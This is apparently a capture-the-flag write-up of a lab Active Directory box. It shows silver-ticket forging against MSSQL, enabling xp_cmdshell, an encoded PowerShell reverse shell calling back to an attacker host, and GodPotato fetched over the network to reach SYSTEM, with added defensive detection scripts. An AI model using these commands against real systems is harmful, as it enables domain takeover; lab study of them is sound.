When a service ticket (TGS) is presented to the MSSQL service, it is trusted as long as it is encrypted with the key of the account the service runs as, here the NT hash of svc_mssql. Since we have that user's password, we can easily calculate the NT hash and forge a ticket that lets us impersonate any user, even a domain admin, in the context of this service. Because the forged ticket is never requested from the KDC, there is no ticket-request event for it on the DC; only the logon at the service itself records the impersonated user.

Domain Admins should have administrative privileges on the MSSQL instance, so that should get us one step closer to owning this DC.

To perform this, we need the domain SID:

lookupsid.py -domain-sid 'breach.vl'/'svc_mssql':'Trustno1'@10.129.193.217
Impacket v0.13.0.dev0+20251006.23741.2d6c563c - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.129.193.217
[*] StringBinding ncacn_np:10.129.193.217[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2330692793-3312915120-706255856
498: BREACH\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BREACH\Administrator (SidTypeUser)
501: BREACH\Guest (SidTypeUser)
502: BREACH\krbtgt (SidTypeUser)
512: BREACH\Domain Admins (SidTypeGroup)
513: BREACH\Domain Users (SidTypeGroup)
514: BREACH\Domain Guests (SidTypeGroup)
515: BREACH\Domain Computers (SidTypeGroup)
516: BREACH\Domain Controllers (SidTypeGroup)
517: BREACH\Cert Publishers (SidTypeAlias)
518: BREACH\Schema Admins (SidTypeGroup)
519: BREACH\Enterprise Admins (SidTypeGroup)
520: BREACH\Group Policy Creator Owners (SidTypeGroup)
521: BREACH\Read-only Domain Controllers (SidTypeGroup)
522: BREACH\Cloneable Domain Controllers (SidTypeGroup)
525: BREACH\Protected Users (SidTypeGroup)
526: BREACH\Key Admins (SidTypeGroup)
527: BREACH\Enterprise Key Admins (SidTypeGroup)
553: BREACH\RAS and IAS Servers (SidTypeAlias)
571: BREACH\Allowed RODC Password Replication Group (SidTypeAlias)
572: BREACH\Denied RODC Password Replication Group (SidTypeAlias)
1000: BREACH\BREACHDC$ (SidTypeUser)
1101: BREACH\DnsAdmins (SidTypeAlias)
1102: BREACH\DnsUpdateProxy (SidTypeGroup)
1103: BREACH\SQLServer2005SQLBrowserUser$BREACHDC (SidTypeAlias)
1104: BREACH\staff (SidTypeGroup)
1105: BREACH\Claire.Pope (SidTypeUser)
1106: BREACH\Julia.Wong (SidTypeUser)
1107: BREACH\Hilary.Reed (SidTypeUser)
1108: BREACH\Diana.Pope (SidTypeUser)
1109: BREACH\Jasmine.Price (SidTypeUser)
1110: BREACH\George.Williams (SidTypeUser)
1111: BREACH\Lawrence.Kaur (SidTypeUser)
1112: BREACH\Jasmine.Slater (SidTypeUser)
1113: BREACH\Hugh.Watts (SidTypeUser)
1114: BREACH\Christine.Bruce (SidTypeUser)
1115: BREACH\svc_mssql (SidTypeUser)

Now we need the NTLM hash of the service account; for that I used an online tool, and with it we can generate a ticket (I tried to generate tickets for all the users, but only Christine.Bruce's authenticates).

└─$ impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn MSSQLSvc/BREACHDC.breach.vl Christine.Bruce
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Christine.Bruce
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Christine.Bruce.ccache

and now we get an MSSQL shell as Administrator:

└─$ export KRB5CCNAME=Christine.Bruce.ccache
└─$ impacket-mssqlclient Christine.Bruce@BREACHDC.breach.vl -k -no-pass                                                                                                               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

and we have sysadmin rights (the sa login itself is disabled):

SQL (BREACH\Administrator  dbo@master)> enum_logins
name                                 type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
----------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa                                   SQL_LOGIN                 1          1               0             0            0              0           0           0           0   
##MS_PolicyEventProcessingLogin##    SQL_LOGIN                 1          0               0             0            0              0           0           0           0   
##MS_PolicyTsqlExecutionLogin##      SQL_LOGIN                 1          0               0             0            0              0           0           0           0   
BREACH\Administrator                 WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   
NT SERVICE\SQLWriter                 WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   
NT SERVICE\Winmgmt                   WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   
NT Service\MSSQL$SQLEXPRESS          WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   
BUILTIN\Users                        WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   
NT AUTHORITY\SYSTEM                  WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   
NT SERVICE\SQLTELEMETRY$SQLEXPRESS   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

Let's enable xp_cmdshell:

SQL (BREACH\Administrator  dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami
output             
----------------   
breach\svc_mssql   
NULL               

Running a base64-encoded PowerShell reverse shell through xp_cmdshell gets us a shell as svc_mssql:

SQL (BREACH\\Administrator  dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADUAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

#on listener
└─$ nc -nlvp 9001                 
listening on [any] 9001 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.90.22] 51136

PS C:\\Windows\\system32> 
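The long -e argument above is the standard PowerShell TCP reverse shell, UTF-16LE encoded. As an added example (not from the page), the decode-and-triage logic a defender would run over process-creation command lines (Sysmon event 1 or Security 4688 with command-line auditing): it finds the encoded argument, decodes it, and flags the TCPClient/IEX shape with its callback address. The three sample command lines are constructed here; the first re-encodes a shortened version of the page's own payload.

```powershell
# Added example: decode -EncodedCommand payloads and flag reverse-shell one-liners.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # powershell -e/-enc/-EncodedCommand takes UTF-16LE, not UTF-8
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function Get-EncodedCommandFinding {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Any of the accepted spellings, followed by a base64 blob
    if (-not ($CommandLine -match '(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})')) {
        return $null
    }
    $decoded = ConvertFrom-EncodedCommand $Matches[1]
    $finding = [pscustomobject]@{
        Verdict  = 'encoded-command'   # encoded but not necessarily malicious
        Callback = $null
        Decoded  = $decoded
    }
    # Net.Sockets.TCPClient("host",port) plus iex/Invoke-Expression is the classic shell
    if ($decoded -match '(?i)TCPClient\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)') {
        $finding.Callback = "$($Matches[1]):$($Matches[2])"
        if ($decoded -match '(?i)\b(iex|invoke-expression)\b') {
            $finding.Verdict = 'reverse-shell'
        }
    }
    return $finding
}

# --- constructed samples ---------------------------------------------------
$shell = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.105",9001);' +
         '$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)'
$enc   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($shell))
$benign = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Service | Out-File C:\temp\svc.txt'))

$samples = @(
    "powershell -e $enc",                                         # the page's pattern
    'powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1', # no encoded arg
    "powershell -EncodedCommand $benign"                          # encoded, harmless
)

foreach ($cmdline in $samples) {
    $f = Get-EncodedCommandFinding $cmdline
    if ($f) { '{0,-16} {1}' -f $f.Verdict, $f.Callback }
}
```

In this box the distinguishing context is the parent: powershell.exe spawned by cmd.exe under sqlservr.exe, which is the xp_cmdshell chain and has no business phoning out to an attacker-controlled host.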

SeImpersonatePrivilege

whoami /priv shows that the svc_mssql token holds SeImpersonatePrivilege, and it is enabled. Service accounts such as the one SQL Server runs under commonly have it, and it is all a Potato-style attack needs to obtain a SYSTEM token:

PS C:\\Windows\\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\\Windows\\system32> 
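As an added example (not the page's own code), a small parser that turns the whoami /priv text into objects and flags the privileges that matter for escalation. The sample text is the output above, embedded as constructed input; without -Text it parses the live token. One caveat worth encoding: the State column only says whether the privilege is currently enabled in the token. "Disabled" does not mean unavailable, because any process holding the privilege can enable it with AdjustTokenPrivileges, so SeAssignPrimaryTokenPrivilege above counts too.

```powershell
# Added example: parse `whoami /priv` and report escalation-relevant privileges,
# whether or not they are currently enabled.

# Why each privilege is interesting (general Windows knowledge, not box-specific).
$Abusable = @{
    'SeImpersonatePrivilege'        = 'Potato family (GodPotato, PrintSpoofer): impersonate SYSTEM'
    'SeAssignPrimaryTokenPrivilege' = 'same goal via CreateProcessAsUser with a stolen token'
    'SeDebugPrivilege'              = 'open SYSTEM processes, dump LSASS'
    'SeBackupPrivilege'             = 'read any file (SAM, NTDS.dit) bypassing ACLs'
    'SeRestorePrivilege'            = 'write any file or registry key bypassing ACLs'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any securable object'
    'SeLoadDriverPrivilege'         = 'load a kernel driver'
    'SeManageVolumePrivilege'       = 'raw volume access, a known arbitrary-write primitive'
}

function ConvertFrom-WhoamiPriv {
    param([string[]]$Lines)
    foreach ($l in $Lines) {
        # Data rows start with Se...Privilege; the banner and ===== rule are skipped
        if ($l -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            [pscustomobject]@{ Name = $Matches[1]; Description = $Matches[2]; State = $Matches[3] }
        }
    }
}

function Get-AbusablePrivilege {
    # Default: parse the current process token
    param([string[]]$Text = (whoami /priv))
    ConvertFrom-WhoamiPriv $Text |
        Where-Object { $Abusable.ContainsKey($_.Name) } |
        Select-Object Name, State, @{ n = 'Why'; e = { $Abusable[$_.Name] } }
}

# Constructed sample: the svc_mssql token from the writeup
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Get-AbusablePrivilege -Text $sample | Format-Table -AutoSize
```

For this token the report lists SeAssignPrimaryTokenPrivilege, SeImpersonatePrivilege and SeManageVolumePrivilege; the first two are the ones GodPotato relies on below.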

We upload GodPotato to C:\\temp and use it to run commands as NT AUTHORITY\\SYSTEM. Note in the output that GodPotato first impersonates NETWORK SERVICE (the RPCSS client that connects to its named pipe) and then finds a SYSTEM token to steal:

PS C:\\temp> iwr http://10.10.14.105/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
PS C:\\temp> .\\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140734504960000
[*] DispatchTable: 0x140734507550584
[*] UseProtseqFunction: 0x140734506842928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\dc465baf-12e3-4fce-9b8f-a0ebfae602b7\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00007c02-1784-ffff-eb44-eb369d31bf96
[*] DCOM obj OXID: 0x5733b412aa7e5133
[*] DCOM obj OID: 0x6ddff73a27048f84
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 920 Token:0x752  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 1400
nt authority\\system
PS C:\\temp> 

and root.txt is on the Administrator's desktop, readable the same way:

PS C:\\temp> .\\GodPotato-NET4.exe -cmd "cmd /c dir C:\\Users\\Administrator\\Desktop"
[*] CombaseModule: 0x140734504960000
[*] DispatchTable: 0x140734507550584
[*] UseProtseqFunction: 0x140734506842928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\a1fb5322-5066-443c-b21a-f8526aef9106\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000dc02-1a08-ffff-64c7-66e5646c9ba2
[*] DCOM obj OXID: 0xbceb56a3ea089caa
[*] DCOM obj OID: 0xc6afe3474fc7800f
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 920 Token:0x752  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 3172
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6

 Directory of C:\\Users\\Administrator\\Desktop

02/17/2022  10:51 AM    <DIR>          .
09/08/2025  10:08 AM    <DIR>          ..
04/17/2025  12:37 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6,213,795,840 bytes free
PS C:\\temp> 
